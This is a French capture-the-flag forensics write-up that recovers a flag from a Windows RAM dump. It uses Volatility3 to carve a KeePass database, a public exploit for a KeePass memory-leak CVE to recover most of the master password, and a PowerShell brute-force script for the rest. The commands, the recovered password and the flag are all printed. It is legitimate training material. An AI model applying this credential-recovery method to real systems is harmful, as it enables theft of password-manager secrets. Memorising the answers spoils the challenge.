# Writeup In the shadow of my memory

## Catégorie :

`Forensic`

## Consigne :

```
Lors de l'une de nos attaques "Red Team", nous avons réussis à avoir accès à l'un des ESXi de l'entreprise et aux machines virtuelles le composant. Malheureusement, nous n'avons pu extraire que la mémoire RAM d'une machine d'administration par faute de temps. Pouvez-vous nous aider à trouver quelque chose de croustillant ? 

`adbaeb44d42f01375a183487c7bd5d59e5ce3607`  [W10_RAM.vmem](https://download.marshack.fr/6c6f82406eeaa2ec175ad1ef25fc017c80be587c/forensics/in_the_shadow_of_my_memory/W10_RAM.vmem)

> Format du flag : Fl@g{XXXXXXXXXX}
```

## Pièce(s) jointe(s) :

```
W10_RAM.vmem
```

## Serveur :

```
Download
```

## Difficulté :

```
easy
```

## Hint : 

```
- Je suis un coffre fort (5 points ?).
- Je suis victime d'une CVE (10 points ?).
```

## Flag :

```
Fl@g{@ga1n_&_@ga1n_th3_M3m0ry_R@M!}
```

## Solution : 

**Étude du fichier mémoire :**

- Téléchargement et installation de l'outil Volatility3.
- Ouverture du fichier mémoire :

```bash
python3 vol.py -f W10_RAM.vmem windows.pstree
```

- Résultat :

```
516     496     csrss.exe       0xd2033b3b2140  12      -       1       False   2024-01-21
604     496     winlogon.exe    0xd2033b10e080  6       -       1       False   2024-01-21
* 3616  604     userinit.exe    0xd2033cef4080  0       -       1       False   2024-01-21
** 3652 3616    explorer.exe    0xd2033d010080  76      -       1       False   2024-01-21
*** 5328        3652    SecurityHealth  0xd2033e0680c0  4       -       1       False   2024-01-21
*** 5448        3652    vmtoolsd.exe    0xd2033db550c0  9       -       1       False   2024-01-21
*** 5636        3652    KeePass.exe     0xd2033decf080  8       -       1       False   2024-01-21
* 988   604     dwm.exe 0xd2033c0c8080  19      -       1       False   2024-01-21
* 764   604     fontdrvhost.ex  0xd2033b1a8180  5       -       1       False   2024-01-21
```

- Le processus KeePass est intéressant, une base de données est sûrement en mémoire :

```bash
python3 vol.py -f W10_RAM.vmem windows.filescan > scan.txt  ### Listing de tous les fichiers en mémoire

cat scan.txt | grep kdb
```

- Résultat :

```
0xd2033e18b6d0  \Database.kdbx  216
 ```

- Une base de données est en mémoire, essayons de l'extraire :

```bash
python3 vol.py -f W10_RAM.vmem windows.dumpfiles --virtaddr 0xd2033e18b6d0
```

- Résultat :

```
Progress:  100.00               PDB scanning finished                        
Cache   FileObject      FileName        Result

DataSectionObject       0xd2033e18b6d0  Database.kdbx   Error dumping file
```

- Une erreur est présente lors de l'extraction mais un fichier, non vide, est créé. En tentant de l'ouvrir avec le logiciel KeePass, celui-ci reconnait bien une base de données et demande un mot de passe.

```
1447542 4.0K -rw------- 1 kali kali 4.0K Jan 23 13:16 file.0xd2033e18b6d0.0xd2033e327a30.DataSectionObject.Database.kdbx.dat
```

**Exploitation d'une CVE afin d'ouvrir le fichier base de donnée KeePass :**
- Afin de faire fonctionner cette CVE, il nous faut :
	- Un dump mémoire du processus KeePass,
	- Ou un dump complet de la mémoire RAM.

- En s'appuyant sur le github de **vdohney** :
	- Il faut installer l'outil fonctionnant sous windows avec les dépendances à NET_SDK associée :
		- dotnet-sdk-8.0.101-win-x64.exe,
		- dotnet-runtime-7.0.15-win-x64.exe
	- Puis lancer les commandes suivantes : 

```bash
dotnet run ".\W10_RAM.vmem"
```
- Résultat :

```
Password candidates (character positions):
Unknown characters are displayed as "●"
1.:     ●
2.:     k, Q, , , d, Ã, t, ', 0, ", à, P, Ô, °, Í, /, ¨, , U, Â, m, >, [, ), I, !, 7, %, 1, ,  , E, X, ´, ÷, S, , c, A, 9, $, £, x, , }, ð, @, ¹, ¤, Y, ?, ¯, _, L, 5, W, , R, 2, Ø, ¢, b, T, ¦, , ÿ, s, G, ï, ], ù, ¿, H, Z, B, ;, -, |, , 4, +, ., *, V, e, , ½, , \, é, ,,
3.:     I,
4.:     n,
5.:     t,
6.:     a,
7.:     h,
8.:     h,
9.:     t,
10.:    7,
11.:    O,
12.:    w,
13.:    a,
14.:    z,
15.:    q,
16.:    p,
17.:    f,
18.:    Q,
19.:    n,
20.:    R,
Combined: ●{k, Q, , , d, Ã, t, ', 0, ", à, P, Ô, °, Í, /, ¨, , U, Â, m, >, [, ), I, !, 7, %, 1, ,  , E, X, ´, ÷, S, , c, A, 9, $, £, x, , }, ð, @, ¹, ¤, Y, ?, ¯, _, L, 5, W, , R, 2, Ø, ¢, b, T, ¦, , ÿ, s, G, ï, ], ù, ¿, H, Z, B, ;, -, |, , 4, +, ., *, V, e, , ½, , \, é, ,}Intahht7OwazqpfQnR
```

- Une partie du mot de passe est donc ressorti de la mémoire RAM : **Intahht7OwazqpfQnR**.
- L'étape suivante est de bruteforcer les 2 premiers caractères en fonction des indications données.
- Pour cela, on va utiliser l'outil powershell du github de **und3sc0n0c1d0** :
> Note : KeePass doit être installé sur la machine pour que le script fonctionne. Il suffit de regarder les lignes de commandes du script PS1 pour voir qu'il se base sur KeePass pour tester le mot de passe.

**importation du module**

```powershell
PS C:\Users\.....\BruteForce-to-KeePass-main> Import-Module .\BruteForce-to-KeePass.ps1
```

**Ajout des données fournies par le précédent script**

```powershell
PS C:\Users\.....\BruteForce-to-KeePass-main> BruteForce-to-KeePass
Type the list of characters: k, Q, , , d, Ã, t, ', 0, ", à, P, Ô, °, Í, /, ¨, , U, Â, m, >, [, ), I, !, 7, %, 1, ,  , E, X, ´, ÷, S, , c, A, 9, $, £, x,, }, ð, @, ¹, ¤, Y, ?, ¯, _, L, 5, W, , R, 2, Ø, ¢, b, T, ¦, , ÿ, s, G, ï, ], ù, ¿, H, Z, B, ;, -, |, , 4, +, ., *, V, e, , ½, , \, é,
Type the known string: Intahht7OwazqpfQnR
Path of the kdbx file: ./file.0xd2033e18b6d0.0xd2033e327a30.DataSectionObject.Database.kdbx.dat
./file.0xd2033e18b6d0.0xd2033e327a30.DataSectionObject.Database.kdbx.dat

AVERTISSEMENT : Master Password Found = PEIntahht7OwazqpfQnR
```

- Mot de passe de la base de données : **PEIntahht7OwazqpfQnR**
- Il ne reste plus qu'à naviguer à l'intérieur de la base de données KeePass pour trouver une entrée nommée "Find_Me", le flag est dedans.

- **FLAG : Fl@g{@ga1n_&_@ga1n_th3_M3m0ry_R@M!}** 
